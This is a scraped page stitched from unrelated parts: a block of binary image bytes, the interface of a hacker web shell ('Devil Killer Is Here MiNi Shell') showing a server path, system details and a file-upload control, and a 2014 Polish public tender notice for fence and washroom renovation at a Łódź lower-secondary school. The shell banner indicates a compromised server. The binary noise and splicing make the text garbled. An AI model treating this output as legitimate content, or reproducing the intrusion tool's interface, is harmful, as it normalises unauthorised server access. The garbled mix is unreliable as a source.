JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140522/172814-N-2014.html

<p class="kh_header"><b>Łódź: Przedmiotem zamówienia są roboty budowlane, które będą prowadzone na nieruchomości    
    Publicznego Gimnazjum nr 41 im. St. Żeromskiego w Łodzi przy ul. Bohdanowicza 11.</b><br>
<b>Numer ogłoszenia: 172814 - 2014; data zamieszczenia: 22.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczne Gimnazjum nr 41 , ul. Karola Bohdanowicza 11, 93-552 Łódź, woj. łódzkie, tel. 42 648 59 26, faks 42 648 59 26.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://gim41.szkoly.lodz.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa administracji samorządowej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są roboty budowlane, które będą prowadzone na nieruchomości    
    Publicznego Gimnazjum nr 41 im. St. Żeromskiego w Łodzi przy ul. Bohdanowicza 11..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie podzielone jest na 3 części:
     
CZĘŚĆ I - robota budowlana polegająca na demontażu starego i wykonaniu nowego, stałego ogrodzenia posesji Publicznego Gimnazjum nr 41 im. St. Żeromskiego  przy ul. Bohdanowicza 11 w Łodzi o długości całkowitej 465 mb  wraz z montażem trzech furtek wejściowych o szerokości 1,2 m i dwóch bram przesuwnych o szerokości 4,5m

1. Zakres robót objęty zamówieniem:
1.1. Roboty rozbiórkowe: 
   -   rozebranie zniszczonego ogrodzenia z siatki ze słupkami betonowymi i podmurówką
   -   wywóz gruzu samochodem samowyładowczym na odległość do 15 km 

1.2.  Roboty budowlano-montażowe
-  montaż elementów ogrodzenia zgodnie z zakresem wskazanym w części rysunkowej dokumentacji:
Ogrodzenie sztachetowe
Konstrukcja nośna z kształtowników stalowych ocynkowanych 40x30 mm i ceowników stalowych ocynkowanych 25x25 mm.
Sztachety wykonane są z balchy Aluzinc. Specjalnie profilowany kształt nadaje im wysoką sztywność i estetyczny wygląd. Standardowa szerokość sztachety to 113 mm. Konstrukcję nośną stanowi ocynkowany kształtownik stalowy. Całość dostępna wg. kolorów palety RAL. 
Aluzinc jest stopem aluminium (55%), cynku (43,4%) i krzemu (1,6%). Taka kompozycja pozwala na wysoką odporność na korozję poprzez synergiczne działanie ochrony katodowej cynku i efektu ekranowania aluminium. Blachy pokrywane są w nim w procesie gorącej galwanizacji zbliżonym do procesu ocynkowania ogniowego. Aluzinc spełnia najostrzejsze wymagania odporności na korozję atmosferyczną i korozję w środowiskach mokrych.

Podmurówka
Podmurówka prefabrykowana ma zapewnić łatwość i szybkość montażu bez względu na warunki gruntowe i pogodowe, gniazda montażowe pełnią rolę dylatacji, dzięki czemu podmurówka nie ulega pęknięciom.
Materiał:
Beton klasy B-20 (C-16 w(g) EUROCODE) o podwyższonej mrozoodporności. Zagęszczony i wibrowany mechanicznie.
Elementy składowe podmurówki:
-	stopa nośna, w formie graniastosłupa z wpustami na płyty cokołowe (1a) i gniazdem montażowym (1b), gwarantującym monolityczne połączenie słupka przęsłowego ze stopą nośną;
-	płyta cokołowa- wypełnienie przęsłowe, element zbrojony;
-	pokrywa stopy, zwieńczenie górne stopy trwale zespolone elastycznym, mrozoodpornym klejem montażowym.

Furtka ogrodzeniowa
Furtka ogrodzeniowa przeznaczona do zamknięcia wejścia na teren obiektów użyteczności publicznej. Skrzydło furtki montowane do słupów osadzonych w betonowym fundamencie, porusza się nad podjazdem - nie potrzebuje dodatkowych elementów podporowych. Zabezpieczenie antykorozyjnie w systemie Duplex - cynkowanie ogniowe i malowanie proszkowe. Deklaracja Zgodności CE.

Bramy przesuwne
-	szyna jezdna 95 x 85 mm, 
-	podwójna rama prowadząca w bramie ręcznej, 
-	pojedynczy słup zamykający wyposażony w chwytak, 
-	tylna podpora stabilizująca skrzydło po jego otwarciu (w zależności od szerokości bramy), 
-	brama z napędem umieszczonym w słupie z zamknięciem w postaci pokrywy, 
-	możliwość wykonania z napędem zewnętrznym. 

Elementy ogrodzenia sztachetowego: słupki, zawiasy, elementy konstrukcyjne bram o furtek oraz obejmy montażowe są zabezpieczone antykorozyjnie powłoką cynkową przez proces cynkowania ogniowego, ściśle wg norm: EN-ISO 1491 ( DIN 50976 ). W wyniku procesu cynkowania ogniowego (kąpieli w ciekłym cynku o temp. 440-460 C) zachodzi na powierzchni cynkowanego elementu zjawisko dyfuzji tzn. stal i cynk tworzą wspólną warstwę stopową, na której odkłada się warstwa czystego cynku. Zabezpieczenie antykorozyjne w systemie DUPLEX polega na nałożeniu na wcześniej odpowiednio przygotowaną powłokę cynkową specjalnej powłoki malarskiej. W systemie DUPLEX powłoką tą jest poliestrowy lakier proszkowy nakładany metodą elektrostatyczną.

Szczegółowy opis przedmiotu zamówienia określa dokumentacja techniczna stanowiąca załącznik do programu funkcjonalno-użytkowego, specyfikacja techniczna wykonania 
i odbioru robót budowlanych wraz z przedmiarem robót, który należy traktować wyłącznie jako dokument pomocniczy. Dokumenty są zawarte w załączniku Nr 1 do SIWZ.

CZĘŚĆ II - robota budowlana polegająca na remoncie pomieszczeń toalet męskich
                    i toalet dla nauczycieli.

1. Charakterystyczne parametry określające zakres robót budowlanych.

Planowany jest remont następujących zespołów pomieszczeń:
- toaleta męska i toaleta dla nauczycieli na I-szym piętrze
- toaleta męska i toaleta dla nauczycieli na II-gim piętrze

Zestawienie powierzchni:
1. Toaleta męska na I-szym piętrze
   - przedsionek z umywalkami		9,28 m2
   - pomieszczenie toalety			8,47 m2
			 Razem		17,75 m2
2. Toaleta dla nauczycieli na I-szym piętrze
   - przedsionek				2,09 m2
   - toaleta		   			1,88 m2
				Razem		3,97 m2

3. Toaleta męska na II-gim piętrze
   - przedsionek z umywalkami		9,28 m2
   - pomieszczenie toalety			8,47 m2
		   		Razem		17,75 m2
4. Toaleta dla nauczycieli na II-gim piętrze
   - przedsionek				2,09 m2
   - toaleta					1,88 m2
				Razem		3,97 m2

Łączna powierzchnia użytkowa	43,44 m2

2. Zakres robót objętych zamówieniem
2.1. Toaleta męska i dla nauczycieli
-	rozebranie okładziny ścian z płytek ceramicznych,
-	skucie wszystkich tynków,
-	skucie warstwy lastrika z posadzki na głębokość umożliwiającą wykonanie nowej 
      posadzki na równo z poziomem posadzki korytarza
-	demontaż wpustów podłogowych,
-	demontaż istniejących rurociągów wod.-kan.,
-	demontaż urządzeń sanitarnych i elementów istniejącej instalacji wod. - kan.,
-	wykonanie nowej instalacji wod. - kan. uwzględniającej podłączenie projektowanych 
      urządzeń,
-	prace budowlane związane z wymianą instalacji wod. - kan.,
-	montaż kratek wentylacyjnych,
-	demontaż istniejącej stolarki drzwiowej 
-	zwiększenie otworu drzwiowego poprzez wykonanie nowego nadproża i wykucie 
      boków
-	obsadzenie w ścianie nowych drzwi na korytarz o szerokości skrzydła 90 cm. 
-	wymiana pionów wodno-kanalizacyjnych do poziomu piwnicy
-	wymiana progu,
-	wykonanie nowej posadzki cementowej,
-	wyrównanie i przygotowanie podłoża,
-	wykonanie podłogi z płytek gresowych,
-	obłożenie parapetów wewnętrznych płytkami ściennymi,
-	dwukrotne malowanie farbą emulsyjną ścian i sufitów wraz z gruntowaniem podłoża, 
-	demontaż istniejące instalacji elektrycznej,
-	wykonanie instalacji elektrycznych - włączników i gniazdek
-	wywóz i utylizacja pozostałości budowlanych.

Szczegółowy opis przedmiotu zamówienia określa dokumentacja techniczna stanowiąca załącznik do programu funkcjonalno-użytkowego, specyfikacja techniczna wykonania 
i odbioru robót budowlanych wraz z przedmiarem robót, który należy traktować wyłącznie jako dokument pomocniczy. Dokumenty są zawarte w załączniku Nr 2 do SIWZ.

CZĘŚĆ III - robota budowlana polegająca na remoncie pomieszczeń natrysków 
                      z przebieralniami.

1. Charakterystyczne parametry określające zakres robót budowlanych.

Planowany jest remont następujących zespołów pomieszczeń:
- natryski z przebieralnią i ustępem w suterenie
- natryski z przebieralnią i ustępem na parterze

1. Zespół natrysków w suterenie
   - przebieralnia			        14,18 m2
   - przedsionek			          	1,21 m2
   - natryski					10,50 m2
   - ustęp				           1,12 m2
				Razem		27,01 m2

2. Zespół natrysków na parterze
   - przebieralnia				14,18 m2
   - przedsionek			           1,21 m2
   - natryski					10,50 m2
   - ustęp					 1,12 m2
				Razem		27,01 m2
	
Łączna powierzchnia użytkowa	          54,02 m2

2. Zakres robót objętych zamówieniem
2.1. Pomieszczenie natrysków i przebieralni
-	rozebranie okładziny ścian z płytek ceramicznych,
-	skucie wszystkich tynków,
-	rozebranie posadzki z płytek ceramicznych,
-	skucie nierówności i dokładne oczyszczenie podłoży,
-	demontaż wpustów podłogowych,
-	demontaż istniejących rurociągów wod.-kan.,
-	demontaż urządzeń sanitarnych i elementów istniejącej instalacji wod. - kan.,
-	wykonanie nowej instalacji wod. - kan. uwzględniającej podłączenie projektowanych
         urządzeń,
-	prace budowlane związane z wymianą instalacji wod. - kan.,
-	montaż kratek wentylacyjnych,
-	demontaż istniejącej stolarki drzwiowej 
-	obsadzenie w ścianie nowych drzwi na korytarz o szerokości skrzydła 90 cm. 
-	Obsadzenie w ścianie nowych drzwi pomiędzy pokojami o szerokości skrzydła 80 cm. 
-	wymiana progu,
-	wykonanie nowej posadzki cementowej,
-	wyrównanie i przygotowanie podłoża,
-	wykonanie podłogi z płytek gresowych,
-	obłożenie parapetów wewnętrznych płytkami ściennymi
-	dwukrotne malowanie farbą emulsyjną ścian i sufitów wraz z gruntowaniem podłoża,
-	demontaż istniejące instalacji elektrycznej,
-	wykonanie instalacji elektrycznych - włączników i gniazdek
-	wywóz i utylizacja pozostałości budowlanych.

Szczegółowy opis przedmiotu zamówienia określa dokumentacja techniczna stanowiąca załącznik do programu funkcjonalno-użytkowego, specyfikacja techniczna wykonania 
i odbioru robót budowlanych wraz z przedmiarem robót, który należy traktować wyłącznie jako dokument pomocniczy. Dokumenty są zawarte w załączniku Nr 2 do SIWZ.


UWAGA: Roboty budowlane wykonywane będą w oparciu o zgłoszenie remontu 
               do Wydziału Architektury i Urbanistyki Urzędu miasta Łodzi. Zgłoszenia 
               dokonano w dniu  29.04.2014 ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.34.00.00-2, 45.30.00.00-0, 45.31.00.00-3, 45.33.00.00-9, 45.43.00.00-0, 45.44.00.00-3, 45.45.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym 
     zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich pięciu lat 
     przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 
     krótszy - w tym okresie, wykonał:
2.1. Dla CZĘŚCI I zamówienia: co najmniej dwie roboty budowlane, które swym zakresem obejmowały wykonanie ogrodzenia o wartości nie mniejszej niż 100 000 zł brutto każda, z tym że jedno z tych ogrodzeń było ogrodzeniem panelowym. Do każdej roboty wykonawca zobowiązany jest dołączyć  dowody określające, czy roboty te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie 
z zasadami sztuki budowlanej i prawidłowo ukończone.

2.2. Dla CZĘŚCI II i CZĘŚCI III zamówienia: co najmniej dwie roboty budowlane, które
      swym zakresem obejmowały budowę, przebudowę lub remont łazienek w budynkach
      użyteczności publicznej lub zamieszkania zbiorowego, o wartości nie mniejszej niż
      50 000 zł brutto każda.
      Do każdej roboty wykonawca zobowiązany jest dołączyć  dowody określające, czy roboty 
      te zostały wykonane w sposób należyty oraz wskazujące, czy zostały wykonane zgodnie 
      z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym 
     zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, iż dysponuje bądź będzie dysponował  
      osobami zdolnymi do wykonania zamówienia, posiadającymi wymagane polskim prawem 
      budowlanym uprawnienia, tj:

3.1. DLA CZĘŚCI I zamówienia
3.1.1. Kierownikiem budowy z uprawnieniami do kierowania robotami budowlanymi 
       w specjalności konstrukcyjno-budowlanej bez ograniczeń, zgodnie z obowiązującym 
       prawem budowlanym lub odpowiadające im ważne uprawnienia budowlane, które 
       zostały wydane na podstawie wcześniej obowiązujących przepisów, albo też posiadającą 
       zdobyte w innych państwach równoważne kwalifikacje zawodowe, które zostały uznane  
       na zasadach określonych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania
       kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 
       Nr 63, poz. 394, ze zm.), 
       Osoba na w/w stanowisku winna udokumentować doświadczenie zawodowe, poprzez 
       złożenie wykazu prowadzonych robót, rozumiane jako co najmniej 2 lata stażu pracy 
       zawodowej na samodzielnym stanowisku (samodzielna funkcja techniczna 
       w budownictwie), w tym co najmniej dwóch robót budowlanych, każda obejmująca 
       swym zakresem wykonanie ogrodzenia o długości co najmniej 150 mb wraz z bramą
       i/lub furtką.

3.2. DLA CZĘŚCI II i CZĘŚCI III zamówienia

3.2.1. Kierownikiem budowy z uprawnieniami do kierowania robotami budowlanymi 
        w specjalności konstrukcyjno-budowlanej bez ograniczeń, zgodnie z obowiązującym 
        prawem budowlanym lub odpowiadające im ważne uprawnienia budowlane, które  
        zostały wydane na podstawie wcześniej obowiązujących przepisów, albo też 
         posiadającą  zdobyte w innych państwach równoważne kwalifikacje zawodowe, które 
        zostały uznane na zasadach określonych w ustawie z dnia 18 marca 2008 r. o zasadach 
        uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii 
        Europejskiej (Dz. U. Nr 63, poz. 394, ze zm.), 
        Osoba na w/w stanowisku winna udokumentować doświadczenie zawodowe, poprzez 
        złożenie wykazu prowadzonych robót, rozumiane jako co najmniej 3 lata stażu pracy 
        zawodowej na samodzielnym stanowisku (samodzielna funkcja techniczna 
        w budownictwie), w tym co najmniej dwóch robót budowlanych, każda obejmująca 
         swym zakresem wykonanie budowy, przebudowy lub remontu łazienek o powierzchni 
        co najmniej 40 m2.
3.2.2. Kierownikiem robót instalacji sanitarnych posiadającym uprawnienia do kierowania   
         robotami budowlanymi w specjalności instalacji sanitarnych w zakresie sieci, instalacji 
        i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń.
        Osoba na w/w stanowisku winna udokumentować doświadczenie zawodowe, poprzez 
        złożenie wykazu prowadzonych robót, rozumiane jako 2 lata stażu pracy zawodowej 
        na samodzielnym stanowisku (samodzielna funkcja techniczna w budownictwie). 
3.2.3. Kierownikiem robót instalacji elektrycznych posiadającym uprawnienia do kierowania 
        robotami budowlanymi w specjalności sieci i instalacji elektrycznych bez ograniczeń. 
         Osoba na w/w stanowisku winna udokumentować doświadczenie zawodowe, poprzez 
         złożenie wykazu prowadzonych robót, rozumiane jako 2 lata stażu pracy zawodowej 
         na samodzielnym stanowisku (samodzielna funkcja techniczna w budownictwie.  

UWAGA:
Ilekroć Zamawiający wymaga określonych uprawnień do pełnienia samodzielnych funkcji technicznych w budownictwie na podstawie aktualnie obowiązującej ustawy z dnia 7 lipca 1994r. - Prawo budowlane (tekst jednolity Dz. U. Nr 243 poz. 1623 z 2010 r.) rozumie przez to również odpowiadające im ważne uprawnienia budowlane, wydane na podstawie uprzednio obowiązujących przepisów prawa lub odpowiednich przepisów obowiązujących 
na terenie kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, uznanych przez właściwy organ zgodnie z ustawą o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca udokumentuje, że posiada 
    środki finansowe lub posiada zdolność kredytową w wysokości co najmniej:
   -  100 000 zł - dla zamówienia z CZĘŚCI I
   -  100 000 zł -  dla zamówienia z CZĘŚCI II
   -  100 000 zł - dla zamówienia z CZĘŚCI III
 
UWAGA:  Jeśli wykonawca składa ofertę na dwie lub trzy CZĘŚCI zamówienia winien jest 
                 udokumentować, że posiada środki finansowe na rachunku bankowym bądź 
                 w spółdzielczej kasie oszczędnościowo-kredytowej lub zdolność kredytową 
                  w wysokości równej co najmniej sumie kwot określonych przez Zamawiającego, 
                dla poszczególnych CZĘŚCI zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ustawy Prawo zamówień publicznych, dopuści zmianę    postanowień zawartej umowy w stosunku do treści oferty, w części dotyczącej przedmiotu umowy, terminów oraz wynagrodzenia, na podstawie której dokonano wyboru
   Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych okoliczności: 
1. Zmiana terminu wykonania przedmiotu zamówienia na skutek: 
     a/ warunków atmosferycznych uniemożliwiających ze względów technologicznych   
